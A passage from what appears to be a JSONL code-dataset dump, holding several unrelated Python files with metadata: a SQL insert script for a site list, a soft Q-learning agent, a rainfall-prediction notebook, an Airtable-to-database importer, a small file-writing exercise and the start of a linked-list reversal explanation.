,\"digicert\"],\r\n [\"I001\" ,\"아이퀘스트\"]\r\n ]\r\n\r\n\r\nfor atSite in site_list: \r\n site_seq = atSite[0].strip();\r\n name = atSite[1].strip();\r\n #print(site_seq+\" \"+name)\r\n query = 'INSERT INTO SITE VALUES(\"'+site_seq+'\",\"'+name+'\");';\r\n print(query)\r\n #cursor.execute(query);\r\n\r\n\r\n# execute SQL query using execute() method.\r\n\r\n# Fetch a single row using fetchone() method.\r\n#data = cursor.fetchone()\r\n#print \"Database version : %s \" % data\r\n\r\n# disconnect from server\r\ndb.commit();\r\ndb.close()\r\n\r\n\r\n\r\n#scriptpath = \"./khh/py27/communication/network/util/NetWorkUtil.py\"\r\n# Add the directory containing your module to the Python path (wants absolute paths)\r\n#sys.path.append(os.path.abspath(scriptpath))\r\n\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = 
foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n ","sub_path":"finger/host_search/InsertSITE.py","file_name":"InsertSITE.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300333342","text":"import configparser\n\nimport torch\nfrom torch import optim\nfrom torch.distributions import Categorical\nimport torch.nn.functional as F\n\nfrom agent import AgentBase\n\nfrom NN import Conv2D_NN\n\n\nclass AgentSQN(AgentBase):\n\n def __init__(self, i, obs_shape, device, start=None, goal=None, config=None):\n super().__init__(i, device, start, goal)\n\n # SQL stuff\n self.policy_model = Conv2D_NN(device=self.device, dict_size=obs_shape[1],\n window_size=obs_shape[-1], num_actions=len(self.actions)).to(self.device)\n\n self.target_model = Conv2D_NN(device=self.device, dict_size=obs_shape[1],\n window_size=obs_shape[-1], num_actions=len(self.actions)).to(self.device)\n\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self.target_model.eval()\n\n if config is None:\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n\n params = config[\"SQN Parameters\"]\n\n # Entropy weighting\n self.alpha = params.getfloat(\"alpha\")\n\n # Batch size\n self.batch_size = params.getint(\"batch_size\")\n\n # Learning rate for the Q table update equation\n self.learning_rate = params.getfloat(\"learning_rate\")\n\n # Discount factor for the Q-table update equation\n self.discount_factor = params.getfloat(\"discount_factor\")\n\n # Step delay before target_model update\n self.update_steps = params.getint(\"update_period\")\n self._learned_steps = 0\n\n self.optimizer = optim.Adam(self.policy_model.parameters(), lr=self.learning_rate)\n\n def select_action(self, observation):\n\n # Shape of observation is (N_batch, Channels_in, Height, Width)\n # observation = torch.FloatTensor(observation).to(self.device) # No longer need to flatten it\n observation = observation.float()\n\n with torch.no_grad():\n # Compute soft Action-Value Q values\n q_values = self.policy_model(observation)\n # Compute soft-Value V values\n v_values = self.alpha * torch.logsumexp(q_values / self.alpha, dim=1, keepdim=True)\n # Compute distribution\n dist = torch.exp((q_values - v_values) / self.alpha)\n dist = dist / torch.sum(dist)\n c = Categorical(dist)\n a = c.sample()\n return a.view(1,) # Want a 1D tensor returned\n\n def select_greedy_action(self, observation):\n observation = observation.float()\n return self.policy_model(observation).max(1)[1].view(1,)\n\n\n def train(self):\n if len(self.experience_replay) < self.batch_size:\n return 0\n\n transitions = self.sample_buffer(self.batch_size)\n\n # Converts batch-array of Transitions to Transition of batch-arrays.\n # [Transition(...), Transition(...)] ---> Transition(observation = [...], ...)\n batch = AgentBase.Transition(*zip(*transitions))\n\n state_batch = torch.cat(batch.state).to(self.device)\n action_batch = torch.cat(batch.action).unsqueeze(1).to(self.device)\n reward_batch = torch.cat(batch.reward).unsqueeze(1).to(self.device)\n\n # Compute a mask of non-final states and concatenate the batch elements\n # (a final state would've been the one after which simulation for this agent ended)\n non_final_mask = ~torch.tensor(batch.done, device=self.device, dtype=torch.bool)\n non_final_next_states = torch.cat(batch.next_state)[non_final_mask].to(self.device)\n\n # 
Compute Q(s_t, a)\n state_action_values = self.policy_model(state_batch) \\\n .gather(1, action_batch.long())\n\n # Compute the expected values\n with torch.no_grad():\n # Compute soft-Q(s_{t+1}, .) for every actions for every states that has a next state\n next_state_q_values = self.target_model(non_final_next_states)\n # Compute soft-V(s_{t+1}) for all the next state\n next_state_values = torch.zeros((self.batch_size, 1), device=self.device)\n next_state_values[non_final_mask] = self.alpha * torch.logsumexp(next_state_q_values / self.alpha,\n dim=1,\n keepdim=True)\n # Compute expected Q-values\n expected_q = (next_state_values * self.discount_factor) + reward_batch\n expected_q = expected_q.float()\n\n loss = F.mse_loss(state_action_values, expected_q)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self._learned_steps += 1\n\n if self._learned_steps % self.update_steps == 0:\n # Update the target network, copying all weights and biases\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self._learned_steps = 0\n\n return loss.item()\n\n def save(self, path):\n torch.save(self.policy_model.state_dict(), path)\n\n def load(self, path):\n self.policy_model.load_state_dict(torch.load(path))\n self.target_model.load_state_dict(self.policy_model.state_dict())\n\n\nclass CoordinatorSQN(AgentSQN):\n def __init__(self, agents, obs_shape, device, config=None):\n super().__init__(0, obs_shape, device, start=None, goal=None, config=config)\n self.agents = agents\n\n def train(self) -> float:\n loss = super().train()\n\n # if self._learned_steps % self.update_steps == 0:\n for agent in self.agents:\n agent.policy_model.load_state_dict(self.policy_model.state_dict())\n\n return loss\n","sub_path":"SQN.py","file_name":"SQN.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410019381","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn import metrics\n\n\n# In[2]:\n\n\n#data collection\ndata = pd.read_csv(\"rainfall in india 1901-2015.csv\")\ndata.head()\n\n\n# In[3]:\n\n\ndata.info()\n\n\n# In[4]:\n\n\n# date preprocessing\ndata.isnull().sum()\n\n\n# In[5]:\n\n\n\ndata.duplicated().sum()\n\n\n# In[6]:\n\n\ndata['SUBDIVISION'].value_counts()\n\n\n# In[7]:\n\n\ndata.mean()\n\n\n# In[8]:\n\n\ndata = data.fillna(data.mean())\n\n\n# In[9]:\n\n\ndata.head(3)\n\n\n# In[10]:\n\n\n\ndata.isnull().any()\n\n\n# In[11]:\n\n\ndata.YEAR.unique()\n\n\n# In[12]:\n\n\ndata.describe()\n\n\n# In[13]:\n\n\ndata.shape\n\n\n# In[14]:\n\n\n# data visulization\ndata[[\"SUBDIVISION\",\"ANNUAL\"]].groupby(\"SUBDIVISION\").sum().sort_values(by='ANNUAL',ascending=False).plot(kind='barh',stacked=True,figsize=(15,10))\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.title(\"Annual Rainfall v/s SubDivisions\")\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# In[16]:\n\n\n\nplt.figure(figsize=(15,8))\ndata.groupby(\"YEAR\").sum()['ANNUAL'].plot(kind=\"line\",color=\"r\",marker=\".\")\nplt.xlabel(\"YEARS\",size=12)\nplt.ylabel(\"RAINFALL IN MM\",size=12)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.title(\"Rainfall over Years\")\nplt.show()\n\n\n# In[17]:\n\n\ndata[['YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL','AUG', 'SEP',\n 'OCT', 'NOV', 
'DEC']].groupby(\"YEAR\").sum().plot(kind=\"line\",figsize=(18,8))\nplt.xlabel(\"Year\",size=13)\nplt.ylabel(\"Rainfall in MM\",size=13)\nplt.title(\"Year v/s Rainfall in each month\",size=20)\nplt.show()\n\n\n# In[18]:\n\n\ndata[['YEAR','Jan-Feb', 'Mar-May',\n 'Jun-Sep', 'Oct-Dec']].groupby(\"YEAR\").sum().plot(figsize=(10,7))\nplt.xlabel(\"Year\",size=13)\nplt.ylabel(\"Rainfall in MM\",size=13)\nplt.show()\n\n\n# In[19]:\n\n\ndata[['SUBDIVISION', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL',\n 'AUG', 'SEP', 'OCT', 'NOV', 'DEC']].groupby(\"SUBDIVISION\").sum().plot(kind=\"barh\",stacked=True,figsize=(13,8))\nplt.title(\"Sub-Division v/s Rainfall in each month\")\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# In[20]:\n\n\ndata[['SUBDIVISION', 'Jan-Feb', 'Mar-May',\n 'Jun-Sep', 'Oct-Dec']].groupby(\"SUBDIVISION\").sum().plot(kind=\"barh\",stacked=True,figsize=(16,8))\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# In[21]:\n\n\nTN = data.loc[((data['SUBDIVISION'] == 'TAMIL NADU'))]\nTN.head(4)\n\n\n# In[22]:\n\n\nTN[['JAN', 'FEB', 'MAR', 'APR','MAY', 'JUN','JUL','AUG', 'SEP', 'OCT','NOV','DEC']].mean().plot(kind=\"bar\",width=0.5,linewidth=2)\nplt.title(\"Tamil Nadu Rainfall v/s Months\",size=20)\nplt.xlabel(\"Months\",size=14)\nplt.ylabel(\"Rainfall in MM\",size=14)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.show()\n\n\n# In[23]:\n\n\n\nTN.groupby(\"YEAR\").sum()['ANNUAL'].plot(ylim=(50,1500),color='r',marker='o',linestyle='-',linewidth=2,figsize=(12,8));\nplt.xlabel('Year',size=14)\nplt.ylabel('Rainfall in MM',size=14)\nplt.title('Tamil Nadu Annual Rainfall from Year 1901 to 2015',size=20)\nplt.grid()\nplt.show()\n\n\n# In[24]:\n\n\nRajasthan = data.loc[((data['SUBDIVISION'] == 'WEST RAJASTHAN') | (data['SUBDIVISION'] == 'EAST RAJASTHAN'))]\nRajasthan.head()\n\n\n# In[25]:\n\n\n\nplt.figure(figsize=(10,6))\nRajasthan[['JAN', 'FEB', 'MAR', 'APR','MAY', 'JUN','JUL','AUG', 'SEP', 'OCT','NOV','DEC']].mean().plot(kind=\"bar\",width=0.5,linewidth=2)\nplt.title(\"Rajasthan Rainfall v/s Months\",size=20)\nplt.xlabel(\"Months\",size=14)\nplt.ylabel(\"Rainfall in MM\",size=14)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.show()\n\n\n# In[26]:\n\n\nRajasthan.groupby(\"YEAR\").mean()['ANNUAL'].plot(ylim=(50,1500),color='r',marker='o',linestyle='-',linewidth=2,figsize=(12,8));\nplt.xlabel('Year',size=14)\nplt.ylabel('Rainfall in MM',size=14)\nplt.title('Rajasthan Annual Rainfall from Year 1901 to 2015',size=20)\nplt.grid()\nplt.show()\n\n\n# In[27]:\n\n\nplt.figure(figsize=(15,6))\nsns.heatmap(data[['JAN','FEB','MAR','APR','MAY','JUN','JUL','AUG','SEP','OCT','NOV','DEC','ANNUAL']].corr(),annot=True)\nplt.show()\n\n\n# In[28]:\n\n\ndata[\"SUBDIVISION\"].nunique()\n\n\n# In[29]:\n\n\n\ngroup = data.groupby('SUBDIVISION')['YEAR','JAN','FEB','MAR','APR','MAY','JUN','JUL','AUG','SEP','OCT','NOV','DEC']\ndata=group.get_group(('TAMIL NADU'))\ndata.head()\n\n\n# In[31]:\n\n\n\ndf=data.melt(['YEAR']).reset_index()\ndf.head()\n\n\n# In[32]:\n\n\ndf= df[['YEAR','variable','value']].reset_index().sort_values(by=['YEAR','index'])\ndf.head()\n\n\n# In[33]:\n\n\n\ndf.YEAR.unique()\n\n\n# In[34]:\n\n\ndf.columns=['Index','Year','Month','Avg_Rainfall']\n\n\n# In[35]:\n\n\ndf.head()\n\n\n# In[36]:\n\n\nMonth_map={'JAN':1,'FEB':2,'MAR' :3,'APR':4,'MAY':5,'JUN':6,'JUL':7,'AUG':8,'SEP':9,\n 
'OCT':10,'NOV':11,'DEC':12}\ndf['Month']=df['Month'].map(Month_map)\ndf.head(12)\n\n\n# In[37]:\n\n\ndf.drop(columns=\"Index\",inplace=True)\n\n\n# In[38]:\n\n\ndf.head(2)\n\n\n# In[39]:\n\n\ndf.groupby(\"Year\").sum().plot()\nplt.show()\n\n\n# In[40]:\n\n\nX=np.asanyarray(df[['Year','Month']]).astype('int')\ny=np.asanyarray(df['Avg_Rainfall']).astype('int')\nprint(X.shape)\nprint(y.shape)\n\n\n# In[41]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=10)\n\n\n# In[42]:\n\n\n#Linear Regression Model\nfrom sklearn.linear_model import LinearRegression\nLR = LinearRegression()\nLR.fit(X_train,y_train)\n\n\n# In[43]:\n\n\n## predicting\ny_train_predict=LR.predict(X_train)\ny_test_predict=LR.predict(X_test)\n\n\n# In[44]:\n\n\n\n#Linear Regression Model\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(LR.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(LR.score(X_test,y_test),3)*100)\n\n\n# In[45]:\n\n\n# Lasso Model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import GridSearchCV\n\n# create a lasso object\nlasso = Lasso(max_iter=100000)\n\n# check for best alpha value using GridSearch\nparameter={'alpha':[1e-15,1e-10,1e-8,1e-3,1e-2,1,5,1e1,1e2,1e3,1e4,1e5,1e6,1e7]}\nlasso_regressor=GridSearchCV(\n lasso,parameter,\n scoring='neg_mean_squared_error',\n cv=5\n )\n\n\n# In[46]:\n\n\n\nlasso_regressor.fit(X_train,y_train)\n\n\n# In[47]:\n\n\n\nprint(\"Best Parameter for Lasso:\",lasso_regressor.best_estimator_)\n\n\n# In[48]:\n\n\nlasso=Lasso(alpha=100.0,max_iter=100000)\n\n# fit into the object\nlasso.fit(X_train,y_train)\n\n\n# In[49]:\n\n\n# predicting\ny_train_predict=lasso.predict(X_train)\ny_test_predict=lasso.predict(X_test)\n\n\n# In[50]:\n\n\n#lasso regression\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(lasso.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(lasso.score(X_test,y_test),3)*100)\n\n\n# In[51]:\n\n\n# Ridge Model\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import GridSearchCV\n \nridge=Ridge()\nparameters={'alpha':[1e-15,1e-10,1e-8,1e-3,1e-2,1,5,10,20,30,35,40,45,50,55,100]}\nridge_regressor=GridSearchCV(ridge,parameters,scoring='neg_mean_squared_error',cv=5)\nridge_regressor.fit(X_train,y_train)\n\nprint(ridge_regressor.best_params_)\nprint(ridge_regressor.best_score_)\n\n\n# 
In[52]:\n\n\n\nprint(\"Best Parameter for Ridge:\",ridge_regressor.best_estimator_)\n\n\n# In[53]:\n\n\n\nridge=Ridge(alpha=100.0)\n\n# fit into the object\nridge.fit(X_train,y_train)\n\n\n# In[54]:\n\n\n# predicting\ny_train_predict=ridge.predict(X_train)\ny_test_predict=ridge.predict(X_test)\n\n\n# In[55]:\n\n\n# Ridge Model\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(ridge.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(ridge.score(X_test,y_test),3)*100)\n\n\n# In[56]:\n\n\n#SVC\nfrom sklearn import preprocessing\nfrom sklearn import svm\n\nsvm_regr = svm.SVC(kernel='rbf')\nsvm_regr.fit(X_train, y_train)\n\n\n# In[57]:\n\n\n\ny_test_predict = svm_regr.predict(X_test)\ny_train_predict = svm_regr.predict(X_train)\n\n\n# In[58]:\n\n\n#SVC\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(svm_regr.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(svm_regr.score(X_test,y_test),3)*100)\n\n\n# In[59]:\n\n\n# Random Forest Model\nfrom sklearn.ensemble import RandomForestRegressor\nrandom_forest_model = RandomForestRegressor(max_depth=100, max_features='sqrt', min_samples_leaf=4,\n min_samples_split=10, n_estimators=800)\nrandom_forest_model.fit(X_train, y_train)\n\n\n# In[60]:\n\n\ny_train_predict=random_forest_model.predict(X_train)\ny_test_predict=random_forest_model.predict(X_test)\n\n\n# In[61]:\n\n\n# Random Forest Model\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\n\n# In[62]:\n\n\nprint(\"-----------Training Accuracy------------\")\nprint(round(random_forest_model.score(X_train,y_train),3)*100)\nprint(\"-----------Testing Accuracy------------\")\nprint(round(random_forest_model.score(X_test,y_test),3)*100)\n\n\n# In[63]:\n\n\n\npredicted = random_forest_model.predict([[2016,11]])\n\n\n# In[64]:\n\n\npredicted\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Rainfall-Prediction .py","file_name":"Rainfall-Prediction 
.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494837501","text":"#angka1, angka2, angka3 = input().split()\n\n\"\"\"\nwith open(\"data.txt\", \"w\") as f:\n\tf.write(str(angka)) #str = membuat int jadi string\n\"\"\"\n\ndaftarNilai = []\n\nfor i in range(6):\n\tdata = input()\n\tdaftarNilai.append(data)\n\nwith open(\"data.txt\", \"a\") as f:\n\tfor nilai in daftarNilai:\n\t\tf.write(str(nilai+\"\\n\"))\n","sub_path":"Learning step/Basic/belajarWrite.py","file_name":"belajarWrite.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210767092","text":"from sqlalchemy_api_handler import humanize\nfrom utils.config import COMMAND_NAME, API_URL, IS_DEVELOPMENT\nfrom utils.date import strptime\n\nfrom models.appearance import Appearance\nfrom models.author_content import AuthorContent\nfrom models.claim import Claim\nfrom models.review import Review\nfrom models.content import Content\nfrom models.medium import Medium\nfrom models.organization import Organization\nfrom models.role import Role, RoleType\nfrom models.user import User\nfrom models.verdict import Verdict, PostType\nfrom utils.config import APP_NAME, DEFAULT_USER_PASSWORD, TLD\nfrom utils.random_token import create_random_password\n\n\ndef appearance_from_row(row, unused_index=None):\n reviewed_items = row.get('Item reviewed')\n if not reviewed_items:\n return None\n\n quoting_content = Content.create_or_modify({\n '__SEARCH_BY__': 'url',\n 'url': row['url'].strip()\n })\n medium_science_feedback_ids = row.get('Outlet')\n if medium_science_feedback_ids:\n medium = Medium.query.filter_by(\n scienceFeedbackIdentifier=medium_science_feedback_ids[0]).first()\n quoting_content.mediumId = medium.id\n\n author_science_feedback_ids = row.get('Authors')\n if author_science_feedback_ids:\n for author_science_feedback_id in author_science_feedback_ids:\n author = User.query.filter_by(\n scienceFeedbackIdentifier=author_science_feedback_id).first()\n author_content = AuthorContent.create_or_modify({\n '__SEARCH_BY__': ['authorId', 'contentId'],\n 'authorId': humanize(author.id),\n 'contentId': humanize(quoting_content.id)\n })\n quoting_content.authorContents = quoting_content.authorContents + [author_content]\n\n quoted_claim = Claim.query.filter_by(\n scienceFeedbackIdentifier=reviewed_items[0]).first()\n quoted_content = None\n if not quoted_claim:\n quoted_content = Content.query.filter_by(\n scienceFeedbackIdentifier=reviewed_items[0]).first()\n if not quoted_claim and not quoted_content:\n return None\n\n testifier_science_feedback_ids = row.get('Verified by')\n if not testifier_science_feedback_ids:\n return None\n testifier = User.query.filter_by(\n scienceFeedbackIdentifier=testifier_science_feedback_ids[0]).first()\n if not testifier:\n return None\n\n if IS_DEVELOPMENT:\n quoting_content.externalThumbUrl = API_URL + '/static/logo.png' if IS_DEVELOPMENT else None\n quoting_content.title = \"/\".join(quoting_content.url\n .replace('http://', '') \\\n .replace('https://', '') \\\n .split('/')[-2:]) \\\n .replace('-', ' ')\n\n appearance_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'quotedClaim': quoted_claim,\n 'quotedContent': quoted_content,\n 'quotingContent': quoting_content,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'testifier': testifier\n }\n\n return Appearance.create_or_modify(appearance_dict)\n\n\ndef 
author_from_row(row, index=None):\n chunks = row.get('Name', '').split(' ')\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else chunks[0]\n last_name = 'Author{}'.format(index) if IS_DEVELOPMENT \\\n else ' '.join(chunks[1:]).replace('\\'', '')\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD),\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if IS_DEVELOPMENT else create_random_password())\n\n role = Role.create_or_modify({\n '__SEARCH_BY__': ['type', 'userId'],\n 'type': RoleType.AUTHOR,\n 'userId': humanize(user.id)\n })\n user.roles = user.roles + [role]\n\n return user\n\n\ndef claim_from_row(row, unused_index=None):\n text = row.get('Claim checked (or Headline if no main claim)')\n if not text:\n return None\n\n claim_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'text': text\n }\n\n return Claim.create_or_modify(claim_dict)\n\n\ndef editor_from_row(row, index=None):\n chunks = row.get('Name', '').split(' ')\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else chunks[0]\n last_name = 'Editor{}'.format(index) if IS_DEVELOPMENT \\\n else ' '.join(chunks[1:]).replace('\\'', '')\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD),\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if IS_DEVELOPMENT else create_random_password())\n\n role = Role.create_or_modify({\n '__SEARCH_BY__': ['type', 'userId'],\n 'type': RoleType.EDITOR,\n 'userId': humanize(user.id)\n })\n user.roles = user.roles + [role]\n\n return user\n\n\ndef outlet_from_row(row, unused_index=None):\n medium_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'name': row['Name'],\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n return Medium.create_or_modify(medium_dict)\n\n\ndef review_from_row(row, unused_index=None):\n science_feedback_reviewer_ids = row.get('Review editor(s)')\n if not science_feedback_reviewer_ids:\n return None\n reviewer = User.query.filter_by(\n scienceFeedbackIdentifier=science_feedback_reviewer_ids[0]).first()\n if not reviewer:\n return None\n\n claim = Claim.query.filter_by(\n scienceFeedbackIdentifier=row['Items reviewed'][0]).first()\n if not claim:\n return None\n\n review_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'claim': claim,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'reviewer': reviewer\n }\n\n return Review.create_or_modify(review_dict)\n\n\ndef reviewer_from_row(row, index=None):\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else row['First name']\n last_name = 'Reviewer{}'.format(index) if IS_DEVELOPMENT \\\n else row['Last name']\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD) if IS_DEVELOPMENT else row['Email'],\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if 
IS_DEVELOPMENT else create_random_password())\n\n    role = Role.create_or_modify({\n        '__SEARCH_BY__': ['type', 'userId'],\n        'type': RoleType.REVIEWER,\n        'userId': humanize(user.id)\n    })\n    user.roles = user.roles + [role]\n\n    return user\n\n\ndef social_from_row(row, unused_index=None):\n    if row.get('url') is None:\n        return None\n\n    organization_name = row['url'].replace('https://www.', '') \\\n                                  .split('/')[0] \\\n                                  .split('.')[0] \\\n                                  .title()\n    organization = Organization.create_or_modify({\n        '__SEARCH_BY__': 'name',\n        'name': organization_name\n    })\n\n    medium_dict = {\n        '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n        'name': row['Name'],\n        'organization': organization,\n        'scienceFeedbackIdentifier': row['airtableId'],\n        'url': row['url']\n    }\n\n    return Medium.create_or_modify(medium_dict)\n\n\ndef verdict_from_row(row, unused_index=None):\n    science_feedback_editor_ids = row.get('Review editor(s)')\n    if not science_feedback_editor_ids:\n        return None\n    editor = User.query.filter_by(scienceFeedbackIdentifier=science_feedback_editor_ids[0]).first()\n    if not editor:\n        return None\n\n    claim = Claim.query.filter_by(scienceFeedbackIdentifier=row['Items reviewed'][0]).first()\n    if not claim:\n        return None\n\n    medium = Medium.query.filter_by(url='/'.join(row['Review url'].split('/')[0:3])).first()\n    published_date = strptime(row['Date of publication'], '%Y-%m-%d')\n    post_type = row['Post type'].lower()\n\n    verdict_dict = {\n        '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n        'claim': claim,\n        'editor': editor,\n        'medium': medium,\n        'scienceFeedbackIdentifier': row['airtableId'],\n        'scienceFeedbackUrl': row['Review url'],\n        'scienceFeedbackPublishedDate': published_date,\n        'title': row['Review headline'],\n        'type': PostType._value2member_map_[post_type]\n    }\n\n    return Verdict.create_or_modify(verdict_dict)\n","sub_path":"api/repository/science_feedback/airtable/entity_from_row.py","file_name":"entity_from_row.py","file_ext":"py","file_size_in_byte":9368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646521358","text":"\"\"\"\n92. Reverse Linked List II\n\n\nReverse a linked list from position m to n. Do it in one-pass.\n\nNote: 1 ≤ m ≤ n ≤ length of list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL, m = 2, n = 4\nOutput: 1->4->3->2->5->NULL\n\n\"\"\"\n\n\nclass ReverseBetween:\n\n    \"\"\"\n    Approach 1: Recursion\n    Intuition\n\n    The idea for linked list reversal using recursion springs from a similar idea that we use for reversing an array. If we want to reverse an array, the huge advantage that we have is the availability of indexes.\n    So, what we can do there is to simply have two pointers, one at the beginning of the array and one at the end. We repeatedly swap elements pointed to by these two pointers and we move both the pointers towards the center of the array.\n    Let's quickly look at this simple algorithm on a sample array before we move on to linked lists.\n\n    Algorithm\n\n    We define a recursion function that will do the job of reversing a portion of the linked list.\n    Let's call this function recurse. The function takes in 3 parameters: m being the starting point of the reversal, n being the ending point for the reversal, and a pointer right which will start at the n-th node in the linked list and move backwards with the backtracking of the recursion.
